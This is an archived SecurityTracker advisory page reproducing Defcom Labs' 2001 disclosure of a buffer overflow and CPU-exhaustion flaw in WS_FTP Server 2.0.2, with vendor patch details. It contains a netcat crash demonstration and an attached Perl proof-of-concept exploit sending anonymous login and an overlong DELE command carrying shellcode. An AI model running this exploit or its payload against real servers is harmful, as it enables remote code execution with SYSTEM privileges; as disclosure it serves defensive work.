SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   WS_FTP Vendors:   Ipswitch
Ipswitch's WS_FTP Server Will Execute Remotely-Supplied Arbitrary Code, Typically With System Privileges
SecurityTracker Alert ID:  1002090
SecurityTracker URL:  http://securitytracker.com/id/1002090
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 27 2001
Impact:   Denial of service via network, Execution of arbitrary code via network, Root access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.0.2; possibly earlier versions
Description:   Defcom Labs reported a vulnerability in the WS_FTP server that allows remote users to execute arbitrary code on the server, typically with System privileges. It may also allow remote users to crash the service.

The buffer overflow can reportedly be triggered by a valid remote user (including anonymous users) using the following commands: DELE, MDTM, MLST, MKD, RMD, RNFR, RNTO, SIZE, STAT, XMKD, and XRMD.

A remote user with a valid FTP account (including anonymous) can send a command with an argument longer than 478 (474 bytes + new return address) bytes, causing a buffer overflow that will overwrite the EIP address.

It is also reported that a remote user with a valid FTP account (including anonymous access) can send several NULL(0x0) characters to cause the WS_FTP Server to consume 100% of CPU resources.

A demonstration exploit script is included in the Source Message.

Impact:   A remote user with FTP account access (including anonymous access) can execute arbitrary code on the server, typically with System level privileges, giving the remote user System level access to the operating system. The remote user may also be able to cause the service to consume all available CPU resources.
Solution:   The vendor has released a patch. See the Vendor URL to obtain the patch.
Vendor URL:  www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html (Links to External Site)
Cause:   Boundary error

Message History:   None.


 Source Message Contents

Subject:  def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS


--------------C4C0A63EEF25A05BF6224EB3
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

======================================================================
                  Defcom Labs Advisory def-2001-28

         WS_FTP server 2.0.2 Buffer Overflow and possible DOS

Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-07-26
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.2 contains a buffer overflow which affects the
following commands:
* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD
This buffer overflow gives an attacker the ability to run code on
the target with SYSTEM RIGHTS, due to the fact that the server runs
as a service by default. OBS: This is only valid when logged in as
an anonymous user, not an ordinary one.

The server also contains a easy-to-trigger DOS.

------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.2, havn't tested other versions

----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
  All the above mentioned commands seems to be using the same parsing
  code which suffers from a buffer overflow. By sending a command with
  an argument greater than 478 (474 bytes + new return address) bytes,
  a buffer will overflow and the EIP will be overwritten. A
  proof-of-concept exploit is attached to the advisory, which works
  against WS_FTP server 2.0.2 running on WIN2K (Professional and
  Server, any SP).

  C:\tools\web>nc -nvv 127.0.0.1 21
  (UNKNOWN) [127.0.0.1] 21 (?) open
  220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  220-Tue Jun 19 14:00:21 2001
  220-30 days remaining on evaluation.
  220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  user ftp
  331 Password required
  pass ftp
  230 user logged in
  DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  Access violation - code c0000005 (first chance)
  eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278
  edi=77fca3e0
  eip=41414141 esp=0104df88 ebp=41414141 iopl=0         nv up ei pl zr
  na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000            
  efl=00010246

* Possible DOS
  By sending a couple of NULL(0x0) characters, the WS_FTP Server
  will spike at 100% CPU.

---------------------------=[Workaround]=-----------------------------

Download the new version from:
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html

-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp.pl

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendors attention on the 18th of
June, 2001. Patch is released.

======================================================================
            This release was brought to you by Defcom Labs

              labs@defcom.com             www.defcom.com
======================================================================
--------------C4C0A63EEF25A05BF6224EB3
Content-Type: application/x-perl;
 name="ws_ftp.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="ws_ftp.pl"

#!/usr/local/bin/perl
#########################################################################
#
# WS_FTP Server 2.0.2 DELE proof-of-concept exploit
# By andreas@defcom.com and janne@defcom.com (C)2001
#
#########################################################################
$login="ftp";	#username
$pass="ftp";	#password
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
	print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n";
	print "It creates a file named defcom.iyd in the c-root\n";
	print "(C)2001 andreas\@defcom.com\n";
   	print "Usage: $0 <host>\n";
	print "Example: $0 127.0.0.1\n";
	exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

sleep(1);
$msg = "user $login\n"; 
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$sploit = "\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76";
$sploit = $sploit . "\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55";
$sploit = $sploit . "\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95";
$sploit = $sploit . "\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83";
$msg = "dele " . $sploit . "\xd4" x (460-length($sploit)) .  "\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95";
$msg = $msg . "\xab\xa3\x54\x77" . "\xd4" x 16 . "\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
exit;
--------------C4C0A63EEF25A05BF6224EB3--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC